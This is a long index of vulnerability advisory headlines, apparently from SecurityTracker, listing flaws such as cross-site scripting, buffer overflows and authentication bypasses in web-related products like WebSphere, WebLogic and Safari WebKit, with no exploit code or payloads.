[1025446] Trustwave WebDefend Enterprise Manager Appliance Lets Remote Authenticated 'bgoperator' Users Gain Root Privileges
[1025444] CA Arcot WebFort Versatile Authentication Server Input Validation Flaws Permit Cross-Site Scripting and URL Redirection Attacks
[1025438] Webmin Unescaped Full Name Value Permits Cross-Site Scripting Attacks
[1025424] CA Output Management Web Viewer ActiveX Controls Let Remote Users Execute Arbitrary Code
[1025370] SAP Web Application Server ITSmobile Input Validation Flaws Permit Cross-Site Scripting Attacks
[1025356] BlackBerry Enterprise Server Input Validation Flaw in BlackBerry Web Desktop Manager Permits Cross-Site Scripting Attacks
[1025298] WebCalendar Input Validation Flaw in 'edit_entry.php' Permits Cross-Site Scripting Attacks
[1025285] IBM WEBi Input Validation Hole Permits Cross-Site Scripting Attacks
[1025271] Cisco Secure Access Control System Management Interface Bug Lets Remote Users Change Arbitrary User Passwords
[1025223] Asterisk Manager Interface Bug Lets Remote Users Consume Excessive Resources
[1025220] TIBCO tibbr Input Validation Hole in Web Service Permits Cross-Site Scripting Attacks
[1025212] Blackberry Device Software Bug in WebKit Lets Remote Users Execute Code
[1025156] IBM Tivoli Netcool OMNIbus Input Validation Flaw in Web GUI Lets Remote Users Inject SQL Commands
[1025130] HP Web Jetadmin Lets Local Users Access Managed Resources
[1025118] Cisco Secure Desktop CSDWebInstaller Bugs Let Remote Users Execute Arbitrary Code
[1025019] IBM Rational Build Forge Input Validation Flaw in User Interface Permits Cross-Site Scripting Attacks
[1025016] Cisco WebEx Player Buffer Overflows Let Remote Users Execute Arbitrary Code
[1025015] Cisco WebEx Player and WebEx Meeting Center Stack Overflows Let Remote Users Execute Arbitrary Code
[1025013] CouchDB Input Validation Hole in Administration User Interface Permits Cross-Site Scripting Attacks
[1024958] Symantec Web Gateway Input Validation Flaw Lets Remote Users Inject SQL Commands
[1024905] GIT gitweb Input Validation Flaw Permits Cross-Site Scripting Attacks
[1024882] Windows Consent User Interface Lets Local Users Gain Elevated Privileges
[1024845] IBM WebSphere Commerce May Disclose One User's Messages to Another User
[1024842] WordPress XML-RPC Interface Bug Lets Remote Authenticated Users Modify Posts
[1024827] HP webOS Unspecified Flaw in Contacts Application Lets Remote Users Execute Arbitrary Code
[1024789] IBM WebSphere MQ Internet pass-thru Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks
[1024741] HP LaserJet Printer Printer Job Language (PJL) Interface Directory Traversal Flaw Lets Remote Users View Arbitrary Files
[1024686] IBM WebSphere Application Server Input Validation Hole in Administrative Console Permits Cross-Site Scripting Attacks
[1024658] Palm webOS Camera Application Lets Local Users Overwrite Arbitrary Files
[1024657] HP LoadRunner Web Tours Lets Remote Users Deny Service
[1024656] Palm webOS Doc Viewer Flaw in Processing Word Documents Lets Remote Users Deny Service
[1024647] Palm webOS Flaw in Service API Lets Local Users Gain Elevated Privileges
[1024569] Oracle WebLogic Node Manager Remote Configuration Capability Lets Remote Users Execute Arbitrary Commands
[1024541] IBM WebSphere Application Server for z/OS Permits Cross-Site Request Forgery Attacks
[1024540] IBM WebSphere Application Server for z/OS Input Validation Flaw Permits Cross-Site Scripting Attacks
[1024496] Microsoft Internet Information Server (IIS) Web Server Stack Overflow in Reading POST Data Lets Remote Users Deny Service
[1024478] RSA Authentication Agent for Web Lets Remote Users Traverse the Directory
[1024451] IBM Lotus Sametime Connect Has Unspecified Web Container Flaw With Unspecified Impact
[1024445] Microsoft Outlook Web Access Authentication Flaw Lets Remote Users Hijack User Sessions
[1024354] WebEx Player ARF String Parsing Heap Overflow Lets Remote Users Execute Arbitrary Code
[1024343] Palm webOS Unspecified Flaws Have Unspecified Impact
[1024342] Palm webOS vCard Processing Flaw Lets Remote Users Execute Arbitrary Code
[1024320] Windows Telephony Application Programming Interfaces Let Certain Local Users Gain Elevated Privileges
[1024250] Mac OS X WebDAV Memory Allocation Error Lets Local Users Deny Service
[1024248] Nessus Web Server Input Validation Flaw Permits Cross-Site Scripting Attacks
[1024214] SAP J2EE Engine Input Validation Flaw in Web Services Navigator Permits Cross-Site Scripting Attacks
[1024204] Oracle WebLogic Plugin Encoding Error Lets Remote Users Inject HTTP Headers
[1024163] Trend Micro InterScan Web Security Virtual Appliance Input Validation Hole Permits Cross-Site Scripting Attacks
[1024153] Trend Micro InterScan Web Security Virtual Appliance Flaws Let Local Users Gain Elevated Privileges and Remote Users Upload/Download Arbitrary Files
[1024133] IBM WebSphere Application Server Axis2 Flaw Lets Remote Users View Arbitrary Files
[1024123] CUPS Administrative Interface Lets Remote Users Obtain Potentially Sensitive Memory Contents
[1024114] SAP J2EE Engine Telnet Interface Lets Remote Authenticated Users Bypass Some Administrative Access Controls
[1024108] Apple iTunes WebKit Bugs Let Remote Users Execute Arbitrary Code
[1024105] Ruby WEBrick Server Input Validation Flaw in Error Pages Permits Cross-Site Scripting Attacks
[1024083] Cisco Application Extension Platform Tech Support Command Line Interface Lets Remote Authenticated Users Gain Administrative Privileges
[1024048] Websense 'Via:' Header Lets Remote Users Bypass Filtering and Monitoring
[1023961] IBM WebSphere MQ Channel Control Process Can Be Crashed By Remote Authenticated Users
[1023917] JBoss Application Server Web Console Flaw Lets Remote Users Bypass Authentication
[1023915] Palm Pre WebOS Input Validation Flaw Lets Remote Users Inject Commands
[1023830] IBM WebSphere Portal Login Flaw Has Unspecified Impact
[1023827] CA XOsoft SOAP Interface Discloses Potentially Sensitive Information to Remote Users
[1023826] CA XOsoft SOAP Interface Discloses Valid Usernames to Remote Users
[1023820] Sun Java System Web Server Discloses Contents of Arbitrary Files to Remote Users
[1023818] uTorrent HTTP Basic Authentication Processing Flaw in WebUI Lets Remote Users Deny Service
[1023802] IBM WEBi Input Validation Flaw Permits Cross-Site Scripting Attacks
[1023770] VMware ESX Server Input Validation Flaws in WebAccess Permit Cross-Site Scripting Attacks
[1023769] VMware Server Input Validation Flaws in WebAccess Permit Cross-Site Scripting Attacks
[1023726] IBM DB2 Content Manager Web Services Single Sign-on Flaw Has Unspecified Impact
[1023708] Apple Safari WebKit Flaws Let Remote Users Execute Arbitrary Code
[1023683] CA SiteMinder Input Validation Flaw in WebWorks Help Permits Cross-Site Scripting Attacks
[1023660] IBM WebSphere Portal Input Validation Hole in 'login.jsp' Permits Cross-Site Scripting Attacks
[1023645] IBM WebSphere Portal Input Validation Flaw Permits Cross-Site Scripting Attacks
[1023611] Mozilla Firefox Web Workers Array Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1023603] GNOME NetworkManager nm-connection-editor D-Bus Interface Discloses Configuration Data to Local Users
[1023551] IBM WebSphere Application Server Single Signon "
[1023502] Oracle WebLogic Node Manager Lets Remote Users Execute Commands
[1023499] Sun Java System Web Server WebDAV Format String Flaw Lets Remote Users Deny Service
[1023498] Sun Java System Web Server Administration Server Null Pointer Dereference Lets Remote Users Deny Service
[1023488] Sun Java System Web Server Heap Overflow in Processing HTTP Digest Authentication Requests Lets Remote Users Execute Arbitrary Code
[1023487] Sun Java System Web Server Heap Overflow in Processing WebDAV Requests Lets Remote Users Execute Arbitrary Code
[1023477] SAP Web Application Server Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
[1023469] Sun Java System Web Server Heap Overflow in Processing TRACE Requests Lets Remote Users Execute Arbitrary Code
[1023465] Zeus Web Server Buffer Overflow in SSL Implementation Lets Remote Users Execute Arbitrary Code
[1023463] IBM Lotus Web Content Management Input Validation Flaw in Login Page Permits Cross-Site Scripting Attacks
[1023457] HP Web Jetadmin Unprotected SQL Server Connection Lets Remote Users Access Data and Deny Service
[1023450] IBM Lotus Domino Web Access Input Validation Holes Permit Cross-Site Scripting Attacks
[1023442] Oracle BEA WebLogic Server and Portal Bugs Let Remote Users Access and Modify Data and Deny Service
[1023429] Ruby WEBrick Input Validation Flaw Lets Remote Users Inject Terminal Commands
[1023427] Sun Java System Web Proxy Server Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks
[1023426] Sun Java System Web Server Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks
[1023411] Red Hat JBoss Enterprise Web Server Protocol Flaw in SSL Renegotiation Lets Remote Users Conduct Man-in-the-Middle Attacks
[1023368] Cisco ASA WebVPN Bookmark List Can Be Bypassed By Remote Authenticated Users
[1023360] Cisco WebEx WRF Player Buffer Overflows Let Remote Users Execute Arbitrary Code
[1023355] Easy File Sharing Web Server Discloses File Listing Database to Remote Users
[1023329] VMware ESX Server Input Validation Flaw in WebWorks Help Permits Cross-Site Scripting Attacks
[1023328] VMware Server, Lab Manager, and vCenter Input Validation Flaw in WebWorks Help Permits Cross-Site Scripting Attacks
[1023318] HP-UX Buffer Overflow in VRTSweb Lets Remote Users Execute Arbitrary Code
[1023315] JBoss Enterprise Application Platform Input Validation Holes in the JMX Console and Web Console Permit Cross-Site Scripting Attacks
[1023313] Veritas Cluster Server Input Validation Flaw in VRTSweb Component Lets Remote Users Execute Arbitrary Code
[1023312] Symantec Veritas NetBackup Manager Input Validation Flaw in VRTSweb Component Lets Remote Users Execute Arbitrary Code
[1023311] Symantec Backup Exec Continuous Protection Server Input Validation Flaw in VRTSweb Component Lets Remote Users Execute Arbitrary Code
[1023309] Symantec Veritas Storage Foundation Input Validation Flaw in VRTSweb Component Lets Remote Users Execute Arbitrary Code
[1023303] CA Service Desk Input Validation Flaws in 'webengine' and 'freeaccess.spl' Permit Cross-Site Scripting Attacks
[1023296] Microsoft Active Directory Federation Services Lets Remote Authenticated Users Execute Arbitrary Code and Spoof Web Sites
[1023255] Cisco ASA Clientless SSL VPN Feature Lets Remote Users Bypass Web Browser Same-Origin Policy Restrictions
[1023181] IBM WebSphere Application Server Input Validation Flaw in Administrative Console Permits Cross-Site Scripting Attacks
[1023166] Apple Safari WebKit FTP Parsing Bugs Let Remote Users Cause Arbitrary Code to Be Executed
[1023165] Apple Safari WebKit Flaw Lets Remote Users Bypass Cross-Origin Resource Sharing Controls
[1023153] Microsoft Web Services on Devices API (WSDAPI) Validation Error Lets Remote Users Execute Arbitrary Code
[1023141] Sun Virtual Desktop Infrastructure VirtualBox Web Service Grants Access to Remote Users
[1023095] Cherokee Web Server GET AUX Request Lets Remote Users Deny Service
[1023070] Websense Email Security 'STEMWADM.EXE' Service Can Be Crashed By Remote Users
[1023062] Oracle BEA WebLogic Server and Portal Bugs Let Remote Authenticated Users Modify Data
[1023049] IBM Rational RequisitePro Input Validation Flaw in ReqWebHelp Permits Cross-Site Scripting Attacks
[1022987] Palm webOS JavaScript Directory Traversal Flaw Lets Remote Users Access Files on the Target Device
[1022962] JUNOS J-Web Input Validation Holes Permit Cross-Site Scripting Attacks
[1022910] Novell GroupWise WebAccess Input Validation Hole in 'User.Theme.index' Parameter Permits Cross-Site Scripting Attacks
[1022905] HP StorageWorks Remote Management Interface Lets Remote Users Deny Service
[1022903] Bugzilla Input Validation Flaw in Bug.search and Bug.create WebService Functions Lets Remote Users Inject SQL Commands
[1022888] IBM WebSphere MQ Bugs Let Remote Users Deny Service
[1022862] IBM WebSphere Application Server doGet/doTrace Method Flaw Lets Remote Users Bypass Security Restrictions
[1022838] IBM Lotus Domino Web Access Input Validation Flaw Permits Cross-Site Scripting Attacks
[1022829] McAfee Email and Web Security Appliance Discloses Arbitrary Files to Remote Users
[1022820] Java Web Start Stack Overflow in Command Launcher Lets Remote Users Execute Arbitrary Code
[1022791] Xerox WorkCentre Web Server Can Be Accessed By Remote Users
[1022753] IBM WebSphere Input Validation Flaw in Partner Gateway Console Lets Remote Users Inject SQL Commands
[1022735] IBM WebSphere Application Server Flaw in SCA Feature Pack Lets Remote Authenticated Users Bypass Access Controls
[1022708] Microsoft Office Web Components Buffer Overflows in ActiveX Control Let Remote Users Execute Arbitrary Code
[1022654] Palm webOS E-mail Notification and Calendar Event Filtering Flaws Let Remote Users Execute Arbitrary HTML Code
[1022604] CommuniGate Pro Input Validation Flaw in WebUser Component Permits Cross-Site Scripting Attacks
[1022598] Sun Java System Access Manager Policy Agent Bug Lets Remote Users Deny Service to the Web Proxy Server
[1022597] IBM Tivoli Identity Manager Console and Self Service Interface Session Fixation Bug Lets Remote Users Hijack Sessions
[1022561] WebLogic Server Bugs Let Remote Users Gain Access and Modify Data and Deny Service
[1022535] Microsoft Office Web Components Bug in Spreadsheet ActiveX Control Lets Remote Users Execute Arbitrary Code
[1022526] Apple Safari WebKit Bug in Processing Numeric Character References Lets Remote Users Execute Arbitrary Code
[1022525] Apple Safari Flaw in WebKit in Processing Parent and Top Objects Lets Remote Users Conduct Cross-Site Scripting Attacks
[1022520] Citrix XenCenterWeb Multiple Flaws Permit Cross-Site Scripting, SQL Injection, and Remote Command Execution Attacks
[1022511] Sun Java System Web Server Discloses JSP Source Code to Remote Users
[1022479] Sun Java Web Console Input Validation Holes Permit Cross-Site Scripting Attacks
[1022367] FreeBSD SIOCSIFINFO_IN6 IOCTL Access Bug Lets Local Users Modify IPv6 Interface Properties
[1022358] Microsoft Internet Information Services WebDAV Bug Lets Remote Users Bypass Authentication
[1022336] Tomcat Bug Lets Web Applications Access the Files of Other Web Applications
[1022334] Sun Java System Web Server Input Validation Hole in Reverse Proxy Plug-in Permits Cross-Site Scripting Attacks
[1022311] IBM WebSphere MQ Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1022267] Novell GroupWise WebAccess Input Validation Flaw in Login Page Permits Cross-Site Scripting Attacks
[1022240] Microsoft Internet Information Server WebDAV Input Validation Flaw Lets Remote Users Execute Arbitrary Code
[1022236] Nortel Contact Center SOAP Interface Discloses 'sysadmin' Password to Remote Users
[1022207] Apple Safari Buffer Overflow in WebKit in Processing SVGList Objects Lets Remote Users Execute Arbitrary Code
[1022169] IceWarp WebMail Server Input Validation Flaw in Groupware Component Lets Remote Users Inject SQL Commands
[1022168] IceWarp WebMail Server Input Validation Hole in RSS Feed Reader Permits Cross-Site Scripting Attacks
[1022167] IceWarp WebMail Server Input Validation Flaw in 'Email View' Permits Cross-Site Scripting Attacks
[1022166] IceWarp WebMail Server Password Reminder Lets Remote Users Inject Mail Header Values
[1022159] GnuTLS Command Line Interface Does Not Properly Validate X.509 Certificates
[1022115] Xitami Web Server HEAD Request Processing Flaw Lets Remote Users Deny Service
[1022095] Mozilla Firefox 'jar:' Scheme Error Processing the 'content-disposition:' Header May Affect Some Web Sites
[1022061] DivX Web Player Heap Overflow in Processing Stream Format Chunks Lets Remote Users Execute Arbitrary Code
[1022059] Oracle WebLogic Server and Portal Bugs Let Remote Users Access and Modify Data and Cause Denial of Service Conditions
[1021971] IBM WebSphere Application Server Interim Fix File Permissions May Let Local Users Gain Elevated Privileges
[1021948] [Unconfirmed] Check Point FireWall-1 Buffer Overflow in PKI Web Service Has Unspecified Impact
[1021896] Cisco IOS WebVPN and SSLVPN Bugs Let Remote Users Deny Service
[1021811] IBM WebSphere Input Validation Flaw in z/OS Sample Application Permits Cross-Site Scripting Attacks
[1021740] IBM WebSphere Partner Gateway RNIF Signature Validation Flaw Lets Remote Users Bypass Security Checks
[1021735] IBM WebSphere Message Broker Discloses Passwords to Local Users
[1021716] InterScan Web Security Suite Discloses Proxy-Authentication Password
[1021709] TYPO3 Input Validation Flaws in Backend User Interface Permit Cross-Site Scripting Attacks
[1021705] BlackBerry Application Web Loader Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code
[1021694] Trend Micro InterScan Web Security Suite Lets Certain Remote Authenticated Users Gain Elevated Privileges
[1021658] IBM WebSphere Discloses Files to Remote Users
[1021571] WebLogic Bugs Let Remote Users Execute Arbitrary Code, Access and Modify Information, and Deny Service
[1021547] IBM WebSphere DataPower Security Gateway Can Be Crashed By Remote Users
[1021484] webcamXP Discloses Files to Remote Users
[1021475] Fujitsu-Siemens WebTransactions Input Validation Flaw Lets Remote Users Execute Arbitrary Commands
[1021318] Java Web Start Bugs Let Remote Users Read/Write Files, Execute Arbitrary Code, and Establish Network Connections
[1021295] Rational ClearCase Input Validation Flaw in Rational Web Platform Permits Cross-Site Scripting Attacks
[1021274] IBM Workplace Web Content Management Input Validation Hole Permits Cross-Site Scripting Attacks
[1021272] Apple iPhone Safari Bugs Let Remote Users Spoof the Interface and Execute Arbitrary Code
[1021058] Websense Enterprise Reporter Module Saves the SQL Database SA Password to Local Users
[1021056] WebLogic Bugs Let Remote Users Execute Arbitrary Code, Access and Modify Information, and Deny Service
[1021038] Sun Java System Web Proxy Server Bug in FTP Subsystem Lets Remote Users Execute Arbitrary Code
[1021030] Mac OS X Weblog ACL Bug May Let Remote Users Bypass Weblog Posting Access Controls
[1020949] CA Service Desk Input Validation Holes in Several Web Forms Permit Cross-Site Scripting Attacks
[1020732] Trend Micro OfficeScan Insufficient Randomization Lets Remote Users Bypass Web Console Authentication
[1020726] Fujitsu Web-Based Admin View Input Validation Flaw Lets Remote Users Traverse the Directory
[1020712] IBM WebSphere Portal Bug Lets Remote Users Bypass Authentication
[1020696] Sun Java Web Proxy Server FTP Subsystem Bug Lets Remote Users Deny Service
[1020657] Alcatel OmniSwitch Management Web Server Stack Overflow Lets Remote Users Execute Arbitrary Code
[1020654] Ruby WEBrick HTTP Server split_header_value() Function Regex Bug Lets Remote Users Deny Service
[1020642] Rational ClearQuest Input Validation Hole in CQWeb Login Page Permits Cross-Site Scripting Attacks
[1020641] Webex Meeting Manager Buffer Overflow in ActiveX Control Lets Remote Users Execute Arbitrary Code
[1020608] Sun N1 Service Provisioning System Administration Console Grants Access to Managed Sun Java System Web Server Systems
[1020588] K9 Web Protection Buffer Overflows in Processing HTTP Responses From the Centralized Server Let Remote Users Execute Arbitrary Code
[1020587] K9 Web Protection Buffer Overflows in Processing HTTP Headers Let Remote Users Execute Arbitrary Code
[1020528] IBM WebSphere Bug in PropFilePasswordEncoder Utility Has Unspecified Impact
[1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
[1020515] Citrix XenServer Input Validation Flaw in XenAPI HTTP Interface Permits Cross-Site Scripting Attacks
[1020498] Oracle WebLogic Server Bugs Let Remote Users Access and Modify Data and Cause Denial of Service Conditions
[1020473] Apple Xcode May Disclose WebObjects Session IDs to Remote Users
[1020452] Java Web Start Bugs Let Remote Users Gain Privileges on the Target System
[1020439] Microsoft Outlook Web Access for Exchange Server Input Validation Bugs Permit Cross-Site Scripting Attacks
[1020357] WebCalendar Include File Bug in 'send_reminders.php' Lets Remote Users Execute Arbitrary Code
[1020330] Safari for Windows WebKit JavaScript Array Memory Corruption Bug Lets Remote Users Execute Arbitrary Code
[1020281] Xerox WorkCentre Extensible Interface Platform Bug Lets Remote Users Modify the Configuration
[1020237] Linksys WRH54G Router Management Interface Can Be Crashed By Remote Users
[1020168] IBM WebSphere Unspecified SOAP Security Header Flaw Has Unspecified Impact
[1020110] Sun Java System Web Server Input Validation Hole in Advanced Search Permits Cross-Site Scripting Attacks
[1020098] IBM Lotus Domino Web Server Stack Overflow in Processing HTTP 'Accept-Language' Header Lets Remote Users Execute Arbitrary Code
[1020097] SAP Web Application Server Input Validation Hole in webgui Permits Cross-Site Scripting Attacks
[1019987] Sun Java System Web Server Input Validation Hole in Search Module Permits Cross-Site Scripting Attacks
[1019985] Sun Java System Web Server Discloses JSP Source Code to Remote Users
[1019968] Bugzilla XML-RPC Interface Bug Lets Remote Users Create Confirmed Bugs
[1019956] IBM WebSphere Java Plug-in Bug Lets Remote Users Gain Privileges
[1019894] IBM WebSphere Unspecified Flaw in Servlet Engine Has Unspecified Impact
[1019870] Safari WebKit Bug in Processing JavaScript Regular Expressions Lets Remote Users Execute Arbitrary Code
[1019869] Safari WebKit Input Validation Bug in Processing URLs Permits Cross-Site Scripting Attacks
[1019846] Nortel Communication Server 1000 Discloses Web Application Structure to Remote Users
[1019655] Safari CFNetwork Bug Lets Remote Proxy Servers Spoof Secure Web Sites
[1019654] Safari WebKit Buffer Overflow Lets Remote Users Execute Arbitrary Code
[1019624] VMware Virtual Machine Communication Interface Memory Corruption Flaw Lets Local Users Deny Service
[1019610] IBM WebSphere MQ for HP NonStop Server Lets Local Users Perform Administrative Tasks
[1019581] Microsoft Office Web Components DataSource Bug Lets Remote Users Execute Arbitrary Code
[1019580] Microsoft Office Web Components URL Parsing Bug Lets Remote Users Execute Arbitrary Code
[1019574] Sun Java Web Console Discloses Whether Files or Directories Exist
[1019566] Rational ClearQuest Web Login Page Discloses Username Validity to Remote Users
[1019562] Ruby Directory Traversal Flaw in WEBrick Library Lets Remote Users View Files on the Target System
[1019552] Java Web Start Buffer Overflow Lets Remote Users Read/Write Files and Execute Applications on the Target User's System
[1019549] Java Web Start Buffer Overflows and Other Bugs Let Remote Users Read/Write Files and Execute Applications on the Target User's System
[1019529] IBM WebSphere MQ Lets Local Users Gain Elevated Privileges in COM+ or .NET Environments
[1019527] IBM WebSphere MQ Lets Local Users Bypass Queue Manager Access Restrictions
[1019455] WebLogic Portal Discloses Web Service WSDL and Policy to Remote Users
[1019454] WebLogic Portal Administrative Policy Errors May Let Remote Users Access Restricted Pages
[1019453] WebLogic Portal Entitlement Deletion Bug May Let Remote Users Access Portlets
[1019452] WebLogic Portal Input Validation Hole in Groupspace Function Permits Cross-Site Scripting Attacks
[1019451] WebLogic Portal Lets Remote Users Bypass Entitlements
[1019450] WebLogic Proxy Plugin Lets Remote Users Deny Service
[1019449] WebLogic Lets Remote Users Bypass the Account Lockout Feature
[1019448] WebLogic Server Administration Console Input Validation Hole Permits Cross-Site Scripting Attacks
[1019447] WebLogic Bug Lets Remote Users Bypass Security Policy and Send Messages to a Queue
[1019444] WebLogic Security Policy Bug May Let Remote Users Access JMS Messages
[1019443] WebLogic Servlets May Grant Access to Remote Users Based on Modified HTTP Request Header Values
[1019442] WebLogic Portal Administration Console May Use Non-Secure Sessions
[1019441] WebLogic Workshop NetUI Input Validation Bugs Permit Cross-Site Scripting Attacks
[1019439] WebLogic Server and WebLogic Express Session Security Bug Lets Remote Authenticated Users Gain Elevated Privileges
[1019438] WebLogic Workshop Input Validation Hole Permits Cross-Site Scripting Attacks
[1019372] Windows WebDAV Mini-Redirector Response Handling Bug Lets Remote Users Execute Arbitrary Code
[1019370] Webmin Input Validation Hole in Processing HTTP Referer Values Permits Cross-Site Scripting Attacks
[1019342] Mozilla Firefox Lets Remote Users Obscure Web Forgery Dialog Warnings
[1019334] Mozilla Firefox Lets Remote Web Sites Corrupt the Password Store in Certain Cases
[1019315] IBM WebSphere Edge Server Input Validation Hole in CGI Mapping Error Page Permits Cross-Site Scripting Attacks
[1019302] GroupWise Input Validation Hole in 'webacc' Permits Cross-Site Scripting Attacks
[1019268] Web Wiz NewsPad Input Validation Flaw in 'FolderName' Parameter Lets Remote Users Traverse the Directory
[1019267] Web Wiz Rich Text Editor Input Validation Flaw Lets Remote Users Traverse the Directory and Create HTML Files
[1019266] Web Wiz Forums Input Validation Flaw in 'FolderName' Parameter Lets Remote Users Traverse the Directory
[1019254] IBM WebSphere Bug in PropFilePasswordEncoder Utility Has Unspecified Impact
[1019252] IBM WebSphere Business Modeler Lets Remote Authenticated Users Delete Repository Objects
[1019251] IBM WebSphere Bug in serveServletsByClassnameEnabled Feature Has Unspecified Impact
[1019174] IBM WebSphere Bug in Administrative Console Has Unspecified Impact
[1019138] IBM Domino Web Access 'dwa7w.dll' ActiveX Control Buffer Overflow May Let Remote Users Execute Arbitrary Code
[1019094] Websense Enterprise Lets Remote Users Bypass Web Filtering With Modified User-Agent Values
[1019091] WebLogic Mobility Server Image Converter Lets Remote Users Access Resources
[1019066] Websense Input Validation Hole in 'username' Parameter Permits Cross-Site Scripting Attacks
[1019053] IBM Lotus Sametime Input Validation Hole in WebRunMenuFrame Page Permits Cross-Site Scripting Attacks
[1019033] Microsoft Web Proxy Auto-Discovery Name Server Resolution Bug Lets Remote Users Conduct Man-in-the-Middle Attacks
[1018963] IBM WebSphere Input Validation Hole in 'Expect' Header Permits Cross-Site Scripting Attacks
[1018948] Mac OS X WebCore/WebKit Bugs Let Remote Users Execute Arbitrary Code
[1018904] Cisco Unified MeetingPlace Web Conferencing Input Validation Hole Permits Cross-Site Scripting Attacks
[1018891] SonicWALL SSL-VPN Client Buffer Overflows in WebCacheCleaner/NeLaunchCtrl ActiveX Controls Let Remote Users Execute Arbitrary Code
[1018884] IBM WebSphere Application Server Input Validation Hole in 'uddigui/navigateTree.do' Page Permits Cross-Site Scripting Attacks
[1018877] IBM WebSphere Application Server API Grants Access to Remote Users
[1018864] Tomcat WebDAV Servlet Lets Remote Users View Arbitrary Files
[1018829] Cisco Unified Contact Center Grants Access to Certain Users to Read Web View Report Information
[1018820] IBM WebSphere Unspecified Flaw in 'wsadmin' Has Unspecified Impact
[1018814] Java Web Start Bugs Let Remote Users Rename/Copy Files on the Target User's System
[1018783] MailBee WebMail Pro Input Validation Hole Permits Cross-Site Scripting Attacks
[1018770] Java Web Start Bugs Let Remote Users Read/Write Files on the Target User's System
[1018738] Solaris Human Interface Device Driver Bug Lets Local Users Deny Service
[1018733] Barracuda Spam Firewall Input Validation Hole in 'Monitor Web Syslog' Page Permits Cross-Site Scripting Attacks
[1018731] Webmin URL Parameter Validation Flaw Lets Remote Users Execute Arbitrary Commands
[1018719] Bugzilla WebService Lets Remote Users Create Accounts
[1018666] IBM WebSphere Unspecified Flaw in Edge Component Has Unspecified Impact
[1018641] Aztech Router Lets Remote Users Access the Management Interface Via TCP Spoofing
[1018622] MSN Messenger Buffer Overflow in Processing Webcam Streams Lets Remote Users Execute Arbitrary Code
[1018620] WebLogic SSL Server May Use Null Encryption
[1018619] WebLogic SSL Clients May Use Null Encryption
[1018601] WebSVN Input Validation Hole in 'filedetails.php' Permits Cross-Site Scripting Attacks
[1018596] eCentrex Web Phone Buffer Overflow in 'uacomx.ocx' ActiveX Control Lets Remote Users Execute Arbitrary Code
[1018586] Yahoo Messenger Heap Overflow in Processing Webcam Streams Lets Remote Users Execute Arbitrary Code
[1018584] Adonis Command Line Interface Lets Local Administrative Users Gain Root Privileges
[1018504] Sun Java System Web Server Redirect URL Encoding Bug Lets Remote Users Conduct HTTP Response Splitting Attacks
[1018494] Mac OS X WebCore Bugs Permit Cross-Domain Scripting Attacks and Java Settings Bypass
[1018448] IBM WebSphere Input Validation Hole in Sample Application Permits Cross-Site Scripting Attacks
[1018435] Citrix Access Gateway Unspecified Bugs Let Remote Users Execute Arbitrary Code, Access Active Sessions, Make Configuration Changes, and Redirect Web Users
[1018354] Windows Vista Firewall Teredo Interface Discloses Network Information to Remote Users and May Let Remote Users Bypass Firewall Rules
[1018346] Java Web Start JNLP Stack Overflow Lets Remote Users
[1018341] SAP DB Web Server Stack Overflow Lets Remote Users Execute Arbitrary Code
[1018328] Java Web Start Applet Privilege Escalation Bug Lets Remote Users Execute Arbitrary Code
[1018288] IBM WebSphere May Disclose One User's Information to Another User in Certain Cases
[1018281] Mac OS X WebKit and WebCore Bugs Permit Cross-Domain Scripting Attacks and Remote Code Execution
[1018210] Blue Coat Systems K9 Web Protection Buffer Overflow May Let Remote Users Execute Arbitrary Code
[1018204] Yahoo Messenger Buffer Overflows in Webcam ActiveX Controls Let Remote Users Execute Arbitrary Code
[1018189] IBM Lotus Domino Web Service Can Be Crashed With Specially Crafted URLs
[1018178] IBM WebSM Lets Remote Users Deny Service
[1018130] Sun Java System Web Proxy Server Buffer Overflows in 'sockd' Let Remote Users Execute Arbitrary Code
[1018067] Check Point Web Intelligence Lets Remote Users Evade Detection With Certain Character Encodings
[1018060] WebLogic Portal Input Validation Hole Permits Cross-Site Scripting Attacks and Entitlement Bug Lets Remote Users Access Resources
[1018059] BEA WebLogic Integration Directory Traversal Bug Lets Remote Users List Certain Directories
[1018057] BEA WebLogic Server Multiple Bugs Let Remote Users Deny Service, Gain Elevated Privileges
[1017986] Java Web Start Incorrect Use of System Classes Lets Users Gain Elevated Privileges
[1017976] IBM WebSphere Unspecified Flaw Has Unspecified Impact
[1017955] Asterisk Manager Interface NULL Pointer Dereference Lets Remote Users Deny Service
[1017932] Novell GroupWise WebAccess Buffer Overflow in Processing HTTP Basic Authentication Lets Remote Users Execute Arbitrary Code
[1017930] Sun Java Web Console Format String Bug Lets Remote Users Execute Arbitrary Code
[1017929] McAfee E-Business Server Administration Interface Can Be Crashed By Remote Users Sending Invalid Packet Length Header Values
[1017926] webMethods Glue 'resource' Parameter Lets Remote Users Traverse the Directory
[1017881] Symantec Enterprise Security Manager Upgrade Interface Lets Remote Users Execute Arbitrary Code
[1017870] IBM Lotus Domino Web Access Input Validation Hole in Processing Multipart MIME Messages Permits Cross-Site Scripting Attacks
[1017824] IBM Lotus Domino Web Access Input Validation Hole Permits Cross-Site Scripting Attacks
[1017806] IBM WebSphere CRLF Validation Bug Permits HTTP Response Splitting Attacks
[1017788] Sun Java System Web Server Sample Application Lets Remote Users Obtain Data
[1017777] Sun Java System Web Server May Let a Remote User With a Revoked Client Certificate Access the System
[1017740] CA eTrust Admin GINA Password Reset Interface Lets Users Gain Privileged Access
[1017734] Novell NetMail Buffer Overflow in WebAdmin Lets Remote Users Execute Arbitrary Code
[1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
[1017711] Webmin Input Validation Hole in 'chooser.cgi' Permits Cross-Site Scripting Attacks
[1017706] CA eTrust Intrusion Detection Administration Interface Lets Remote Users Deny Service
[1017700] Mozilla Firefox Custom Cursor May Let Remote Users Spoof Portions of the User Interface
[1017699] Mozilla Firefox Cache Collision May Let Remote Users Obtain Cached Web Page Contents
[1017628] SAP Web Application Server Lets Remote Users Traverse the Directory and Deny Service
[1017558] Symantec Web Security Input Validation Hole Permits Cross-Site Scripting and Denial of Service Attacks
